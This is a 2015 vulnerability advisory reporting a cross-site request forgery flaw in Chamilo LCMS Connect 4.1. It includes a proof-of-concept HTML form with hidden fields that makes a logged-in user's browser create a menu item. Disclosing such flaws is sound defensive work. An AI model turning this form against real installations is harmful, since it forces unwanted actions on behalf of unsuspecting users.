Chamilo LCMS Connect 4.1 Cross Site Request Forgery
Posted on 28 March 2015
Hi Team, #Affected Vendor: http://lcms.chamilo.org/ #Date: 27/03/2015 #Discovered by: Joel Vadodil Varghese #Type of vulnerability: XSRF #Tested on: Windows 7 #Product: LCMS Connect #Version: 4.1 #Description: Chamilo is an open-source (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. Chamilo LCMS is a completely new software platform for e-learning and collaboration. The application is vulnerable to XSRF attacks. If an attacker is able to lure a user into clicking a crafted link or by embedding such a link within web pages he could control the user's actions. #Proof of Concept (PoC): ------------------------------------ <form method="POST" name="form1" action=" http://localhost:80/Chamilo/index.php?application=menu&go=creator&type=coremenuApplicationItem "> <input type="hidden" name="parent" value="0"/> <input type="hidden" name="title[de]" value=""/> <input type="hidden" name="title[en]" value="tester"/> <input type="hidden" name="title[fr]" value=""/> <input type="hidden" name="title[nl]" value=""/> <input type="hidden" name="application" value="weblcms"/> <input type="hidden" name="submit_button" value="Create"/> <input type="hidden" name="_qf__item" value=""/> <input type="hidden" name="type" value="coremenuApplicationItem"/> </form> -- Regards, *Joel V*
